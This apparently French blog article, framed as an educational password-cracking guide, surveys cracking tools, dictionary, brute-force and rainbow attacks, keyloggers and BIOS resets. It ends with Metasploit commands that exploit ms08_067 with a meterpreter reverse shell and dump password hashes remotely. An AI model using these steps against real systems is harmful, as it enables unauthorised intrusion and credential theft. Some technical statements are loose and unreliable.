Pirater un mot de passe - Guide éducatifs

Cet article est destiné à des fins éducatives et de sensibilisation aux dangers de l’utilisation de mots de passe, et n’est pas une invitation à quelque chose de contraire à l’objectif principal.

 

Pirater un mot de passe - Guide éducatifs

Les mots de passe sont parmi les cibles les plus courantes des pirates simplement parce que le piratage de mots de passe est l’une des astuces les plus faciles à réaliser. Alors que la plupart des gens pensent que la création de phrases de passe plus longues est difficile à déchiffrer, les pirates sont conscients que la plupart des gens négligent généralement de protéger leurs informations d’identification d’utilisateur.

Les informations de connexion confidentielles, telles que les mots de passe, sont parmi les maillons les plus faibles de la sécurité technologique, car c’est cette fonction de sécurité qui ne repose que sur le secret. Une fois que ce secret a été divulgué, toute responsabilité est ignorée et les systèmes sont facilement compromis.

Si vous entrez directement dans l’esprit d’un attaquant, vous réaliserez peut-être qu’il existe de nombreuses façons de connaître le mot de passe d’un utilisateur, car il est trop vulnérable. Le plus gros problème de se fier simplement aux mots de passe pour la sécurité est que le plus souvent, un utilisateur fournit également ses informations d’utilisateur à d’autres utilisateurs. Bien qu’un utilisateur puisse intentionnellement ou non donner son mot de passe, une fois que ce code secret est sorti, vous n’avez aucun moyen de savoir qui d’autre sait de quoi il s’agit. À ce stade, il est important de savoir que lorsque quelqu’un connaît le mot de passe d’un utilisateur, cela ne fait pas de cette personne un utilisateur autorisé sur un réseau.

Comment sont cracker les mots de passe?

S’il n’est pas possible pour un pirate de connaître le mot de passe d’un utilisateur par inférence, ingénierie sociale et attaque physique (dont nous parlerons en détail dans les chapitres suivants), il peut à la place utiliser plusieurs outils de craquage de mot de passe, tels que les suivants :

  1. Cain & Abel – utilisé pour cracker les hachages LanManager NT et LM (NTLM), les hachages Pic et Cisco IOS, les hachages Radius et les mots de passe Windows RDP.
  2. Elmcomsoft Distributed Password Recovery – craque les mots de passe PKCS, Microsoft Office et PGP. Il peut également être utilisé pour craquer des mots de passe distribués et récupérer 10 000 ordinateurs en réseau. Il utilise également l’accélérateur GPU qui peut augmenter sa vitesse de craquage jusqu’à 50 fois.
  3. Elcomsoft System Recovery – réinitialise les mots de passe Windows, réinitialise toutes les expirations de mot de passe et définit les informations d’identification administratives.
  4. John the Ripper – craque les mots de passe hachés Windows, Unix et Linux
  5. Ophcrack – utilise des tables arc-en-ciel pour déchiffrer les mots de passe Windows
  6. Pandora – craque les mots de passe des utilisateurs hors ligne ou en ligne pour les comptes Novell Netware
  7. Récupération proactive du mot de passe du système – récupère tout mot de passe stocké localement sur un système d’exploitation Windows. Cela inclut les mots de passe pour les connexions, VPN, RAS, SYSKEY et même WEP ou WPA Connexions.
  8. RainbowCrack – craque les hachages MD5 et LanManager à l’aide de la table Rainbow.

Notez que certains de ces outils peuvent nécessiter un accès physique au système que vous souhaitez pirater. Dans le même ordre d’idées, gardez à l’esprit qu’une fois qu’un pirate informatique a un accès physique à un système que vous avez l’intention de protéger, il pourrait fouiller dans tous les fichiers protégés par mot de passe ou cryptés que vous avez, tant qu’il dispose des bons outils.

Lorsque vous testez des tactiques pour déchiffrer des mots de passe, l’une des choses les plus importantes dont vous devez vous souvenir est que la technique que vous devez tester sera basée sur le type de cryptage du mot de passe que vous devez déchiffrer. De plus, si vous testez des hacks de piratage de mots de passe, vous devrez peut-être également vous rappeler qu’il est possible que certains systèmes verrouillent les utilisateurs associés, ce qui peut entraîner un déni de service pour les utilisateurs qui utilisent le réseau.

Remarques sur le cryptage du mot de passe

Les mots de passe, après leur création, sont ensuite cryptés à l’aide d’un algorithme de hachage à sens unique. Ces mots de passe hachés sont alors considérés comme des chaînes chiffrées. Pour des raisons évidentes, les hachages créés ne sont pas réversibles, ce qui rend les mots de passe impossibles à déchiffrer. Si vous essayez de casser des mots de passe sur un système d’exploitation Linux, il y a un degré supplémentaire de difficulté à le faire en raison du degré supplémentaire d’aléatoire dans les mots de passe, car ce système d’exploitation ajoute du « sel », ou une valeur aléatoire pour rendre les mots de passe plus uniques. et empêcher deux utilisateurs d’acquérir la même valeur de hachage.

Cependant, si vous avez les bons outils, vous pouvez lancer différents types d’attaques pour tenter de récupérer ou cracker un mot de passe. En voici quelques uns:

1. Attaques par dictionnaire

  • Comme leur nom l’indique, ces attaques utilisent des mots disponibles dans le dictionnaire contre la base de données de mots de passe du système. Ce type d’attaque vous permet de découvrir facilement des mots de passe faibles ou des mots de passe qui utilisent des orthographes alternatives, comme mot de passe pour remplacer « mot de passe ». La force d’un outil d’attaque par dictionnaire est basée sur la quantité de mots de vocabulaire qu’il contient.

2. Attaques par force brute

  • Ces attaques sont capables de déchiffrer n’importe quel type de mot de passe car elles utilisent toutes les combinaisons de lettres, de caractères spéciaux et de chiffres jusqu’à ce que le mot de passe d’un appareil soit déchiffré avec succès. Cependant, il est facile de deviner le défaut de cette technique – cela peut prendre beaucoup de temps pour découvrir un mot de passe, surtout s’il est fort.

3. Attaques arc-en-ciel – Rainbow attacks 

  • Les attaques arc-en-ciel sont idéales pour déchiffrer les mots de passe hachés, et ces types d’attaques peuvent générer des taux de réussite plus élevés. Les outils qui utilisent les attaques arc-en-ciel peuvent également déchiffrer les mots de passe plus rapidement, par rapport aux dictionnaires et aux outils d’attaque par force brute. Le seul défaut de ce type d’attaque est qu’il ne peut découvrir que les mots de passe de 14 caractères ou moins.

Autres façons de découvrir les mots de passe

Comme mentionné précédemment, le moyen le plus simple de déchiffrer un mot de passe est d’avoir un accès physique au système que vous essayez de pirater. Si vous n’êtes pas en mesure d’utiliser des outils de craquage sur un système, vous pouvez utiliser les techniques suivantes à la place :

1. Enregistrement des frappes

  • C’est facilement l’une des techniques les plus efficaces de craquage de mot de passe, car elle utilise un dispositif d’enregistrement qui capture les frappes au fur et à mesure qu’elles sont tapées sur un clavier. Vous pouvez utiliser un logiciel d’enregistrement de clavier, tel que KeyLogger Stealth et Spector Pro, ou un matériel d’enregistrement de frappe tel que KeyGhost.

2. Recherche de stockages de mots de passe faibles

  • Il y a trop d’applications dans la plupart des ordinateurs qui stockent les mots de passe localement, ce qui les rend très vulnérables au piratage. Une fois que vous avez physiquement accès à un ordinateur, vous pouvez facilement trouver les mots de passe en recherchant simplement les vulnérabilités de stockage ou en utilisant des recherches de texte. Si vous êtes assez chanceux, vous pouvez même trouver des mots de passe stockés sur l’application elle-même.

3. Mots de passe BIOS faibles

  • De nombreux ordinateurs permettent aux utilisateurs d’utiliser des mots de passe de mise sous tension afin de protéger les paramètres matériels situés dans leurs puces CMOS. Cependant, vous pouvez facilement réinitialiser ces mots de passe en changeant simplement un seul cavalier sur la carte mère ou en débranchant la batterie CMOS de la carte. Vous pouvez également tenter votre chance et rechercher en ligne les identifiants de connexion utilisateur par défaut pour différents types de cartes mères en ligne.

4. Saisissez les mots de passe à distance

  • Si l’accès physique au système ou à son emplacement est impossible, vous pouvez toujours récupérer les mots de passe stockés localement sur un système fonctionnant sur un système d’exploitation Windows à partir d’un emplacement distant et même récupérer les informations d’identification du compte d’administrateur système. Vous pouvez le faire en effectuant d’abord une attaque par usurpation d’identité, puis en exploitant le fichier SAM sur le fichier de registre de l’ordinateur ciblé en suivant ces étapes :

1. Ouvrez Metasploit et tapez la commande suivante :

msf > use exploit/windows/smb/ms08_067_netapi

2. Ensuite, entrez la commande suivante :

msf (ms08_067_netapi) > set payload /windows/meterpreter/reverse_tcp

Après cela, Metaploit vous montrera que vous devez avoir l’adresse IP de la cible (RHOST) et l’adresse IP de l’appareil que vous utilisez (LHOST). Si vous disposez déjà de ces informations, vous pouvez utiliser les commandes suivantes pour définir les adresses IP a exploiter:

msf (ms08_067_netapi) > définir RHOST [adresse IP cible]
msf (ms08_067_netapi) > définir LHOST [votre adresse IP]

3. Maintenant, lancez l’exploit en tapant la commande suivante :

msf (ms08_067_netapi) > exploiter

Cela vous donnera une invite de terminal qui vous permettra d’accéder à l’ordinateur de la cible
à distance.

4. Saisissez le hachage du mot de passe

Étant donné que la plupart des systèmes d’exploitation et des applications ont tendance à stocker les mots de passe hachés à des fins de chiffrement, vous ne pourrez peut-être pas voir immédiatement les informations d’identification de l’utilisateur que vous recherchez. Cependant, vous pouvez obtenir ces hachages et les interpréter plus tard. Pour saisir le hachages, utilisez cette commande :

meterpreter > hashdump

Commentaires